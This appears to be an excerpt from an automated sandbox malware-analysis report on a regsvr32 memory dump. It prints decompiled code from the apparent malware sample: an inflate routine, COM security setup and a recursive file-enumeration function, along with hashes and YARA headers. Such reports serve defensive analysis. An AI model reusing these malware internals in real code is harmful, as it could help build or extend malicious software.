                                                                                                                                                                        											_t423 = _t368 - _t361;
                                                                                                                                                                        											_t330 = _t435[6] - 3;
                                                                                                                                                                        											 *_t368 =  *_t423;
                                                                                                                                                                        											_t424 = _t423 + 3;
                                                                                                                                                                        											 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t423 + 1));
                                                                                                                                                                        											 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t423 + 2));
                                                                                                                                                                        											memcpy(_t368 + 3, _t424, _t330);
                                                                                                                                                                        											_t435 =  &(_t435[3]);
                                                                                                                                                                        											_t368 = _t424 + _t330 + _t330;
                                                                                                                                                                        											_t396 = _t435[0xb];
                                                                                                                                                                        										} else {
                                                                                                                                                                        											_t389 = _t368 - 1;
                                                                                                                                                                        											_t222 =  *_t389;
                                                                                                                                                                        											_t333 = _t435[6] - 3;
                                                                                                                                                                        											 *(_t389 + 1) = _t222;
                                                                                                                                                                        											 *(_t389 + 2) = _t222;
                                                                                                                                                                        											 *(_t389 + 3) = _t222;
                                                                                                                                                                        											_t390 = _t389 + 4;
                                                                                                                                                                        											memset(_t390, _t222, _t333 << 0);
                                                                                                                                                                        											_t435 =  &(_t435[3]);
                                                                                                                                                                        											_t368 = _t390 + _t333;
                                                                                                                                                                        										}
                                                                                                                                                                        										goto L22;
                                                                                                                                                                        									}
                                                                                                                                                                        									if(_t253 < _t316) {
                                                                                                                                                                        										asm("lodsw");
                                                                                                                                                                        										_t336 = _t253;
                                                                                                                                                                        										_t253 = _t253 + 0x10;
                                                                                                                                                                        										_t431 = _t431 | 0 << _t336;
                                                                                                                                                                        										_t316 = _t336;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t253 = _t253 - _t316;
                                                                                                                                                                        									_t227 = (0x00000001 << _t316) - 0x00000001 & _t431;
                                                                                                                                                                        									_t431 = _t431 >> _t316;
                                                                                                                                                                        									_t361 = _t361 + _t227;
                                                                                                                                                                        									goto L38;
                                                                                                                                                                        								}
                                                                                                                                                                        								L22:
                                                                                                                                                                        							} while (_t435[4] > _t368 && _t435[5] > _t396);
                                                                                                                                                                        							L104:
                                                                                                                                                                        							if( *0x49fe040 == 2) {
                                                                                                                                                                        								_t253 = _t431;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t176 = _t435[0x16];
                                                                                                                                                                        							_t351 =  *((intOrPtr*)(_t176 + 0x1c));
                                                                                                                                                                        							_t282 = _t253 >> 3;
                                                                                                                                                                        							_t397 = _t396 - _t282;
                                                                                                                                                                        							_t254 = _t253 - (_t282 << 3);
                                                                                                                                                                        							 *(_t176 + 0xc) = _t368;
                                                                                                                                                                        							 *(_t351 + 0x3c) = _t254;
                                                                                                                                                                        							_t284 = _t254;
                                                                                                                                                                        							_t255 =  &(_t435[7]);
                                                                                                                                                                        							if(_t435[5] == _t255) {
                                                                                                                                                                        								_t266 =  *_t176;
                                                                                                                                                                        								_t435[5] = _t266;
                                                                                                                                                                        								_t397 = _t397 - _t255 + _t266;
                                                                                                                                                                        								_t435[5] = _t435[5] +  *((intOrPtr*)(_t176 + 4)) - 0xb;
                                                                                                                                                                        							}
                                                                                                                                                                        							 *_t176 = _t397;
                                                                                                                                                                        							_t258 = (1 << _t284) - 1;
                                                                                                                                                                        							if( *0x49fe040 == 2) {
                                                                                                                                                                        								asm("psrlq mm0, mm1");
                                                                                                                                                                        								asm("movd ebp, mm0");
                                                                                                                                                                        								asm("emms");
                                                                                                                                                                        							}
                                                                                                                                                                        							 *(_t351 + 0x38) = _t431 & _t258;
                                                                                                                                                                        							_t259 = _t435[5];
                                                                                                                                                                        							if(_t259 <= _t397) {
                                                                                                                                                                        								 *((intOrPtr*)(_t176 + 4)) =  ~(_t397 - _t259) + 0xb;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								 *((intOrPtr*)(_t176 + 4)) = _t259 - _t397 + 0xb;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t260 = _t435[4];
                                                                                                                                                                        							if(_t260 <= _t368) {
                                                                                                                                                                        								 *((intOrPtr*)(_t176 + 0x10)) =  ~(_t368 - _t260) + 0x101;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								 *((intOrPtr*)(_t176 + 0x10)) = _t260 - _t368 + 0x101;
                                                                                                                                                                        							}
                                                                                                                                                                        							asm("popfd");
                                                                                                                                                                        							return _t176;
                                                                                                                                                                        						}
                                                                                                                                                                        						_push(_t172);
                                                                                                                                                                        						_push(_t252);
                                                                                                                                                                        						_push(_t278);
                                                                                                                                                                        						_push(_t347);
                                                                                                                                                                        						asm("pushfd");
                                                                                                                                                                        						 *_t435 =  *_t435 ^ 0x00200000;
                                                                                                                                                                        						asm("popfd");
                                                                                                                                                                        						asm("pushfd");
                                                                                                                                                                        						_pop(_t364);
                                                                                                                                                                        						_t365 = _t364 ^  *_t435;
                                                                                                                                                                        						if(_t365 == 0) {
                                                                                                                                                                        							L15:
                                                                                                                                                                        							 *0x49fe040 = 3;
                                                                                                                                                                        							L16:
                                                                                                                                                                        							_pop(_t347);
                                                                                                                                                                        							_pop(_t278);
                                                                                                                                                                        							_pop(_t252);
                                                                                                                                                                        							_pop(_t172);
                                                                                                                                                                        							continue;
                                                                                                                                                                        						}
                                                                                                                                                                        						asm("cpuid");
                                                                                                                                                                        						if(_t252 != 0x756e6547 || _t278 != 0x6c65746e || _t365 != 0x49656e69) {
                                                                                                                                                                        							goto L15;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							asm("cpuid");
                                                                                                                                                                        							if(0xd != 6 || (_t365 & 0x00800000) == 0) {
                                                                                                                                                                        								goto L15;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								 *0x49fe040 = 2;
                                                                                                                                                                        								goto L16;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					asm("emms");
                                                                                                                                                                        					asm("movd mm0, ebp");
                                                                                                                                                                        					_t431 = _t252;
                                                                                                                                                                        					asm("movd mm4, dword [esp]");
                                                                                                                                                                        					asm("movq mm3, mm4");
                                                                                                                                                                        					asm("movd mm5, dword [esp+0x4]");
                                                                                                                                                                        					asm("movq mm2, mm5");
                                                                                                                                                                        					asm("pxor mm1, mm1");
                                                                                                                                                                        					_t253 = _t435[2];
                                                                                                                                                                        					do {
                                                                                                                                                                        						asm("psrlq mm0, mm1");
                                                                                                                                                                        						if(_t431 <= 0x20) {
                                                                                                                                                                        							asm("movd mm6, ebp");
                                                                                                                                                                        							asm("movd mm7, dword [esi]");
                                                                                                                                                                        							_t396 = _t396 + 4;
                                                                                                                                                                        							asm("psllq mm7, mm6");
                                                                                                                                                                        							_t431 = _t431 + 0x20;
                                                                                                                                                                        							asm("por mm0, mm7");
                                                                                                                                                                        						}
                                                                                                                                                                        						asm("pand mm4, mm0");
                                                                                                                                                                        						asm("movd eax, mm4");
                                                                                                                                                                        						asm("movq mm4, mm3");
                                                                                                                                                                        						_t173 =  *(_t253 + _t172 * 4);
                                                                                                                                                                        						while(1) {
                                                                                                                                                                        							_t279 = _t173 & 0x000000ff;
                                                                                                                                                                        							asm("movd mm1, ecx");
                                                                                                                                                                        							_t431 = _t431 - _t279;
                                                                                                                                                                        							if(_t173 == 0) {
                                                                                                                                                                        								break;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t349 = _t173 >> 0x10;
                                                                                                                                                                        							if((_t173 & 0x00000010) == 0) {
                                                                                                                                                                        								if((_t173 & 0x00000040) != 0) {
                                                                                                                                                                        									goto L97;
                                                                                                                                                                        								}
                                                                                                                                                                        								asm("psrlq mm0, mm1");
                                                                                                                                                                        								asm("movd ecx, mm0");
                                                                                                                                                                        								_t173 =  *(_t253 + ((_t279 &  *(0x49f668c + (_t173 & 0x0000000f) * 4)) + _t349) * 4);
                                                                                                                                                                        								continue;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t178 = _t173 & 0x0000000f;
                                                                                                                                                                        							if(_t178 != 0) {
                                                                                                                                                                        								asm("psrlq mm0, mm1");
                                                                                                                                                                        								asm("movd mm1, eax");
                                                                                                                                                                        								asm("movd ecx, mm0");
                                                                                                                                                                        								_t431 = _t431 - _t178;
                                                                                                                                                                        								_t349 = _t349 + (_t279 &  *(0x49f668c + _t178 * 4));
                                                                                                                                                                        							}
                                                                                                                                                                        							asm("psrlq mm0, mm1");
                                                                                                                                                                        							if(_t431 <= 0x20) {
                                                                                                                                                                        								asm("movd mm6, ebp");
                                                                                                                                                                        								asm("movd mm7, dword [esi]");
                                                                                                                                                                        								_t396 = _t396 + 4;
                                                                                                                                                                        								asm("psllq mm7, mm6");
                                                                                                                                                                        								_t431 = _t431 + 0x20;
                                                                                                                                                                        								asm("por mm0, mm7");
                                                                                                                                                                        							}
                                                                                                                                                                        							asm("pand mm5, mm0");
                                                                                                                                                                        							asm("movd eax, mm5");
                                                                                                                                                                        							asm("movq mm5, mm2");
                                                                                                                                                                        							_t179 =  *(_t435[3] + _t178 * 4);
                                                                                                                                                                        							while(1) {
                                                                                                                                                                        								_t287 = _t179 & 0x000000ff;
                                                                                                                                                                        								_t253 = _t179 >> 0x10;
                                                                                                                                                                        								_t431 = _t431 - _t287;
                                                                                                                                                                        								asm("movd mm1, ecx");
                                                                                                                                                                        								if((_t179 & 0x00000010) != 0) {
                                                                                                                                                                        									break;
                                                                                                                                                                        								}
                                                                                                                                                                        								if((_t179 & 0x00000040) != 0) {
                                                                                                                                                                        									goto L96;
                                                                                                                                                                        								}
                                                                                                                                                                        								asm("psrlq mm0, mm1");
                                                                                                                                                                        								asm("movd ecx, mm0");
                                                                                                                                                                        								_t179 =  *(_t435[3] + ((_t287 &  *(0x49f668c + (_t179 & 0x0000000f) * 4)) + _t253) * 4);
                                                                                                                                                                        							}
                                                                                                                                                                        							_t182 = _t179 & 0x0000000f;
                                                                                                                                                                        							if(_t182 == 0) {
                                                                                                                                                                        								if(_t253 != 1 || _t435[0xa] == _t368) {
                                                                                                                                                                        									L76:
                                                                                                                                                                        									_t435[0xb] = _t396;
                                                                                                                                                                        									_t184 = _t368 - _t435[0xa];
                                                                                                                                                                        									if(_t184 < _t253) {
                                                                                                                                                                        										_t185 = _t435[0xd];
                                                                                                                                                                        										_t291 =  ~_t184;
                                                                                                                                                                        										_t403 = _t435[0xe];
                                                                                                                                                                        										if(_t185 < _t253) {
                                                                                                                                                                        											goto L100;
                                                                                                                                                                        										}
                                                                                                                                                                        										_t292 = _t291 + _t253;
                                                                                                                                                                        										if(_t435[0xc] != 0) {
                                                                                                                                                                        											_t186 = _t435[0xc];
                                                                                                                                                                        											if(_t292 <= _t186) {
                                                                                                                                                                        												_t405 = _t403 + _t186 - _t292;
                                                                                                                                                                        												if(_t349 > _t292) {
                                                                                                                                                                        													_t349 = _t349 - _t292;
                                                                                                                                                                        													memcpy(_t368, _t405, _t292);
                                                                                                                                                                        													_t435 =  &(_t435[3]);
                                                                                                                                                                        													_t368 = _t405 + _t292 + _t292;
                                                                                                                                                                        													_t405 = _t368 - _t253;
                                                                                                                                                                        												}
                                                                                                                                                                        											} else {
                                                                                                                                                                        												_t405 = _t403 + _t435[0xd] + _t186 - _t292;
                                                                                                                                                                        												_t296 = _t292 - _t186;
                                                                                                                                                                        												if(_t349 > _t296) {
                                                                                                                                                                        													_t349 = _t349 - _t296;
                                                                                                                                                                        													memcpy(_t368, _t405, _t296);
                                                                                                                                                                        													_t435 =  &(_t435[3]);
                                                                                                                                                                        													_t368 = _t405 + _t296 + _t296;
                                                                                                                                                                        													_t405 = _t435[0xe];
                                                                                                                                                                        													_t298 = _t435[0xc];
                                                                                                                                                                        													if(_t349 > _t298) {
                                                                                                                                                                        														_t349 = _t349 - _t298;
                                                                                                                                                                        														memcpy(_t368, _t405, _t298);
                                                                                                                                                                        														_t435 =  &(_t435[3]);
                                                                                                                                                                        														_t368 = _t405 + _t298 + _t298;
                                                                                                                                                                        														_t405 = _t368 - _t253;
                                                                                                                                                                        													}
                                                                                                                                                                        												}
                                                                                                                                                                        											}
                                                                                                                                                                        										} else {
                                                                                                                                                                        											_t405 = _t403 + _t185 - _t292;
                                                                                                                                                                        											if(_t349 > _t292) {
                                                                                                                                                                        												_t349 = _t349 - _t292;
                                                                                                                                                                        												memcpy(_t368, _t405, _t292);
                                                                                                                                                                        												_t435 =  &(_t435[3]);
                                                                                                                                                                        												_t368 = _t405 + _t292 + _t292;
                                                                                                                                                                        												_t405 = _t368 - _t253;
                                                                                                                                                                        											}
                                                                                                                                                                        										}
                                                                                                                                                                        										_t293 = _t349;
                                                                                                                                                                        										_t172 = memcpy(_t368, _t405, _t293);
                                                                                                                                                                        										_t435 =  &(_t435[3]);
                                                                                                                                                                        										_t368 = _t405 + _t293 + _t293;
                                                                                                                                                                        										_t396 = _t435[0xb];
                                                                                                                                                                        										_t253 = _t435[2];
                                                                                                                                                                        										goto L64;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t412 = _t368 - _t253;
                                                                                                                                                                        									_t302 = _t349 - 3;
                                                                                                                                                                        									 *_t368 =  *_t412;
                                                                                                                                                                        									_t413 = _t412 + 3;
                                                                                                                                                                        									 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t412 + 1));
                                                                                                                                                                        									 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t412 + 2));
                                                                                                                                                                        									_t172 = memcpy(_t368 + 3, _t413, _t302);
                                                                                                                                                                        									_t435 =  &(_t435[3]);
                                                                                                                                                                        									_t368 = _t413 + _t302 + _t302;
                                                                                                                                                                        									_t396 = _t435[0xb];
                                                                                                                                                                        									_t253 = _t435[2];
                                                                                                                                                                        									goto L64;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									_t380 = _t368 - 1;
                                                                                                                                                                        									_t194 =  *_t380;
                                                                                                                                                                        									_t305 = _t349 - 3;
                                                                                                                                                                        									 *(_t380 + 1) = _t194;
                                                                                                                                                                        									 *(_t380 + 2) = _t194;
                                                                                                                                                                        									 *(_t380 + 3) = _t194;
                                                                                                                                                                        									_t381 = _t380 + 4;
                                                                                                                                                                        									_t172 = memset(_t381, _t194, _t305 << 0);
                                                                                                                                                                        									_t435 =  &(_t435[3]);
                                                                                                                                                                        									_t368 = _t381 + _t305;
                                                                                                                                                                        									_t253 = _t435[2];
                                                                                                                                                                        									L64:
                                                                                                                                                                        									if(_t435[4] <= _t368) {
                                                                                                                                                                        										goto L104;
                                                                                                                                                                        									}
                                                                                                                                                                        									goto L65;
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        							asm("psrlq mm0, mm1");
                                                                                                                                                                        							asm("movd mm1, eax");
                                                                                                                                                                        							asm("movd ecx, mm0");
                                                                                                                                                                        							_t431 = _t431 - _t182;
                                                                                                                                                                        							_t253 = _t253 + (_t287 &  *(0x49f668c + _t182 * 4));
                                                                                                                                                                        							goto L76;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t172 = _t173 >> 0x10;
                                                                                                                                                                        						asm("stosb");
                                                                                                                                                                        						goto L64;
                                                                                                                                                                        						L65:
                                                                                                                                                                        					} while (_t435[5] > _t396);
                                                                                                                                                                        					goto L104;
                                                                                                                                                                        				}
                                                                                                                                                                        			}
                                                                                                                                                                        0x049f6a6b
                                                                                                                                                                        0x049f6a6b
                                                                                                                                                                        0x049f6a2d
                                                                                                                                                                        0x049f6a33
                                                                                                                                                                        0x049f6a35
                                                                                                                                                                        0x049f6a37
                                                                                                                                                                        0x049f6a3d
                                                                                                                                                                        0x049f6a41
                                                                                                                                                                        0x049f6a41
                                                                                                                                                                        0x049f6a41
                                                                                                                                                                        0x049f6a43
                                                                                                                                                                        0x049f6a47
                                                                                                                                                                        0x049f6a4d
                                                                                                                                                                        0x049f6a51
                                                                                                                                                                        0x049f6a51
                                                                                                                                                                        0x049f6a51
                                                                                                                                                                        0x049f6a55
                                                                                                                                                                        0x049f6a55
                                                                                                                                                                        0x049f6a4d
                                                                                                                                                                        0x049f6a3d
                                                                                                                                                                        0x049f6a01
                                                                                                                                                                        0x049f6a03
                                                                                                                                                                        0x049f6a05
                                                                                                                                                                        0x049f6a0b
                                                                                                                                                                        0x049f6a0f
                                                                                                                                                                        0x049f6a0f
                                                                                                                                                                        0x049f6a0f
                                                                                                                                                                        0x049f6a13
                                                                                                                                                                        0x049f6a13
                                                                                                                                                                        0x049f6a0b
                                                                                                                                                                        0x049f6a6d
                                                                                                                                                                        0x049f6a6f
                                                                                                                                                                        0x049f6a6f
                                                                                                                                                                        0x049f6a6f
                                                                                                                                                                        0x049f6a71
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f6a71
                                                                                                                                                                        0x049f6956
                                                                                                                                                                        0x049f6958
                                                                                                                                                                        0x049f695d
                                                                                                                                                                        0x049f6965
                                                                                                                                                                        0x049f6968
                                                                                                                                                                        0x049f696b
                                                                                                                                                                        0x049f6971
                                                                                                                                                                        0x049f6971
                                                                                                                                                                        0x049f6971
                                                                                                                                                                        0x049f6973
                                                                                                                                                                        0x049f6987
                                                                                                                                                                        0x049f6987
                                                                                                                                                                        0x049f698c
                                                                                                                                                                        0x049f698e
                                                                                                                                                                        0x049f6991
                                                                                                                                                                        0x049f6994
                                                                                                                                                                        0x049f6997
                                                                                                                                                                        0x049f699a
                                                                                                                                                                        0x049f699d
                                                                                                                                                                        0x049f699d
                                                                                                                                                                        0x049f699d
                                                                                                                                                                        0x049f699d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f697f
                                                                                                                                                                        0x049f6919
                                                                                                                                                                        0x049f691f
                                                                                                                                                                        0x049f6921
                                                                                                                                                                        0x049f6923
                                                                                                                                                                        0x049f6928
                                                                                                                                                                        0x049f692a
                                                                                                                                                                        0x049f692a
                                                                                                                                                                        0x049f6934
                                                                                                                                                                        0x049f6936
                                                                                                                                                                        0x049f6938
                                                                                                                                                                        0x049f693a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f693a
                                                                                                                                                                        0x049f688c
                                                                                                                                                                        0x049f688c
                                                                                                                                                                        0x049f6cf8
                                                                                                                                                                        0x049f6cff
                                                                                                                                                                        0x049f6d01
                                                                                                                                                                        0x049f6d01
                                                                                                                                                                        0x049f6d03
                                                                                                                                                                        0x049f6d09
                                                                                                                                                                        0x049f6d0c
                                                                                                                                                                        0x049f6d0f
                                                                                                                                                                        0x049f6d14
                                                                                                                                                                        0x049f6d16
                                                                                                                                                                        0x049f6d19
                                                                                                                                                                        0x049f6d1c
                                                                                                                                                                        0x049f6d1e
                                                                                                                                                                        0x049f6d26
                                                                                                                                                                        0x049f6d2a
                                                                                                                                                                        0x049f6d2c
                                                                                                                                                                        0x049f6d30
                                                                                                                                                                        0x049f6d38
                                                                                                                                                                        0x049f6d38
                                                                                                                                                                        0x049f6d3c
                                                                                                                                                                        0x049f6d45
                                                                                                                                                                        0x049f6d4d
                                                                                                                                                                        0x049f6d4f
                                                                                                                                                                        0x049f6d52
                                                                                                                                                                        0x049f6d55
                                                                                                                                                                        0x049f6d55
                                                                                                                                                                        0x049f6d59
                                                                                                                                                                        0x049f6d5c
                                                                                                                                                                        0x049f6d62
                                                                                                                                                                        0x049f6d75
                                                                                                                                                                        0x049f6d64
                                                                                                                                                                        0x049f6d69
                                                                                                                                                                        0x049f6d69
                                                                                                                                                                        0x049f6d78
                                                                                                                                                                        0x049f6d7e
                                                                                                                                                                        0x049f6d97
                                                                                                                                                                        0x049f6d80
                                                                                                                                                                        0x049f6d88
                                                                                                                                                                        0x049f6d88
                                                                                                                                                                        0x049f6d9d
                                                                                                                                                                        0x049f6da2
                                                                                                                                                                        0x049f6da2
                                                                                                                                                                        0x049f67f5
                                                                                                                                                                        0x049f67f6
                                                                                                                                                                        0x049f67f7
                                                                                                                                                                        0x049f67f8
                                                                                                                                                                        0x049f67f9
                                                                                                                                                                        0x049f67fd
                                                                                                                                                                        0x049f6804
                                                                                                                                                                        0x049f6805
                                                                                                                                                                        0x049f6806
                                                                                                                                                                        0x049f6807
                                                                                                                                                                        0x049f6809
                                                                                                                                                                        0x049f684f
                                                                                                                                                                        0x049f684f
                                                                                                                                                                        0x049f6859
                                                                                                                                                                        0x049f6859
                                                                                                                                                                        0x049f685a
                                                                                                                                                                        0x049f685b
                                                                                                                                                                        0x049f685c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f685c
                                                                                                                                                                        0x049f680d
                                                                                                                                                                        0x049f6815
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f6827
                                                                                                                                                                        0x049f682c
                                                                                                                                                                        0x049f6837
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f6843
                                                                                                                                                                        0x049f6843
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f6843
                                                                                                                                                                        0x049f6837
                                                                                                                                                                        0x049f6815
                                                                                                                                                                        0x049f6a7c
                                                                                                                                                                        0x049f6a7e
                                                                                                                                                                        0x049f6a81
                                                                                                                                                                        0x049f6a83

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: Genu$ineI$invalid distance code$invalid distance too far back$invalid literal/length code$ntel
                                                                                                                                                                        • API String ID: 0-3089872807
                                                                                                                                                                        • Opcode ID: 1e5c129fbe39f62aea5fe05668b7033fc3ac5211c685b8261dcf6f14276ba74c
                                                                                                                                                                        • Instruction ID: c80228467d989c736f48d80d88493ddfc90a9904d5b53142a36b77dcd9d056fd
                                                                                                                                                                        • Opcode Fuzzy Hash: 1e5c129fbe39f62aea5fe05668b7033fc3ac5211c685b8261dcf6f14276ba74c
                                                                                                                                                                        • Instruction Fuzzy Hash: FB120632A083518FD714CE38C99022ABBE2FB84354F488A3DEA9597B41E375FD5AD741
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 30%
                                                                                                                                                                        			E049EE400(void* __ecx) {
                                                                                                                                                                        				char _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				char* _t15;
                                                                                                                                                                        				intOrPtr* _t16;
                                                                                                                                                                        				void* _t21;
                                                                                                                                                                        				intOrPtr* _t23;
                                                                                                                                                                        				intOrPtr* _t24;
                                                                                                                                                                        				intOrPtr* _t25;
                                                                                                                                                                        				void* _t30;
                                                                                                                                                                        				void* _t33;
                                                                                                                                                                        
                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                        				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                                                                                                                                                                        				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                                                                                                                                                                        				_t15 =  &_v12;
                                                                                                                                                                        				__imp__CoCreateInstance(0x49fc868, 0, 1, 0x49fc878, _t15);
                                                                                                                                                                        				if(_t15 < 0) {
                                                                                                                                                                        					L5:
                                                                                                                                                                        					_t23 = _v8;
                                                                                                                                                                        					if(_t23 != 0) {
                                                                                                                                                                        						 *((intOrPtr*)( *_t23 + 8))(_t23);
                                                                                                                                                                        					}
                                                                                                                                                                        					_t24 = _v12;
                                                                                                                                                                        					if(_t24 != 0) {
                                                                                                                                                                        						 *((intOrPtr*)( *_t24 + 8))(_t24);
                                                                                                                                                                        					}
                                                                                                                                                                        					_t16 = 0;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					__imp__#2(__ecx);
                                                                                                                                                                        					_t25 = _v12;
                                                                                                                                                                        					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                                                                                                                                                                        					if(_t21 < 0) {
                                                                                                                                                                        						goto L5;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                                                                                                                                                                        						if(_t21 < 0) {
                                                                                                                                                                        							goto L5;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t16 = E049E8BDE(8);
                                                                                                                                                                        							if(_t16 == 0) {
                                                                                                                                                                        								goto L5;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								 *((intOrPtr*)(_t16 + 4)) = _v12;
                                                                                                                                                                        								 *_t16 = _v8;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t16;
                                                                                                                                                                        			}














                                                                                                                                                                        APIs
                                                                                                                                                                        • CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,049EE731,000009DA,00000000,?,00000000), ref: 049EE413
                                                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,049EE731,000009DA,00000000,?,00000000), ref: 049EE424
                                                                                                                                                                        • CoCreateInstance.OLE32(049FC868,00000000,00000001,049FC878,?,?,049EE731,000009DA,00000000,?,00000000), ref: 049EE43B
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 049EE446
                                                                                                                                                                        • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,049EE731,000009DA,00000000,?,00000000), ref: 049EE471
                                                                                                                                                                          • Part of subcall function 049E8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,049E959D,00000100,?,049E6507), ref: 049E8BEC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1610782348-0
                                                                                                                                                                        • Opcode ID: 07ff7b741f514cddd00a728b27c5d49f4629b899d9104d7317ea7a01e3d4f295
                                                                                                                                                                        • Instruction ID: a6bc1cb3f9d35e6e1f2877fa7f7924cec2e5fb7459f36731b0d70a2f89ac437a
                                                                                                                                                                        • Opcode Fuzzy Hash: 07ff7b741f514cddd00a728b27c5d49f4629b899d9104d7317ea7a01e3d4f295
                                                                                                                                                                        • Instruction Fuzzy Hash: 0821FC70700249BFEB259B67DC4DE6BBF7CEFC6B15F10416DB505A6290E675AA00CA30
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 78%
                                                                                                                                                                        			E049EBCFC(void* __ecx, void* __fp0, intOrPtr _a16) {
                                                                                                                                                                        				char _v12;
                                                                                                                                                                        				WCHAR* _v16;
                                                                                                                                                                        				struct _WIN32_FIND_DATAW _v608;
                                                                                                                                                                        				WCHAR* _t24;
                                                                                                                                                                        				intOrPtr _t31;
                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                        				void* _t45;
                                                                                                                                                                        				intOrPtr _t46;
                                                                                                                                                                        				void* _t48;
                                                                                                                                                                        				intOrPtr _t54;
                                                                                                                                                                        				void* _t59;
                                                                                                                                                                        				char _t60;
                                                                                                                                                                        				void* _t61;
                                                                                                                                                                        				void* _t62;
                                                                                                                                                                        				void* _t63;
                                                                                                                                                                        				void* _t75;
                                                                                                                                                                        
                                                                                                                                                                        				_t75 = __fp0;
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_t48 = __ecx;
                                                                                                                                                                        				_push(L"\\*");
                                                                                                                                                                        				_t24 = E049E9A5A(__ecx);
                                                                                                                                                                        				_t63 = _t62 + 0xc;
                                                                                                                                                                        				_v16 = _t24;
                                                                                                                                                                        				if(_t24 == 0) {
                                                                                                                                                                        					return _t24;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t59 = FindFirstFileW(_t24,  &_v608);
                                                                                                                                                                        				if(_t59 == 0xffffffff) {
                                                                                                                                                                        					L14:
                                                                                                                                                                        					return E049E8BF4( &_v16, 0xfffffffe);
                                                                                                                                                                        				} else {
                                                                                                                                                                        					goto L2;
                                                                                                                                                                        				}
                                                                                                                                                                        				do {
                                                                                                                                                                        					L2:
                                                                                                                                                                        					if(E049EBCD4( &(_v608.cFileName)) != 0) {
                                                                                                                                                                        						goto L12;
                                                                                                                                                                        					}
                                                                                                                                                                        					if((_v608.dwFileAttributes & 0x00000010) != 0) {
                                                                                                                                                                        						L10:
                                                                                                                                                                        						_push(0);
                                                                                                                                                                        						_push( &(_v608.cFileName));
                                                                                                                                                                        						_push(0x49fc9a0);
                                                                                                                                                                        						_t60 = E049E9A5A(_t48);
                                                                                                                                                                        						_t63 = _t63 + 0x10;
                                                                                                                                                                        						_v12 = _t60;
                                                                                                                                                                        						if(_t60 != 0) {
                                                                                                                                                                        							_t54 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        							 *((intOrPtr*)(_t54 + 0xc0))(1);
                                                                                                                                                                        							_push(1);
                                                                                                                                                                        							_push(1);
                                                                                                                                                                        							_push(0);
                                                                                                                                                                        							E049EBCFC(_t60, _t75, 1, 5, E049F0015, _a16);
                                                                                                                                                                        							_t63 = _t63 + 0x1c;
                                                                                                                                                                        							E049E8BF4( &_v12, 0xfffffffe);
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L12;
                                                                                                                                                                        					}
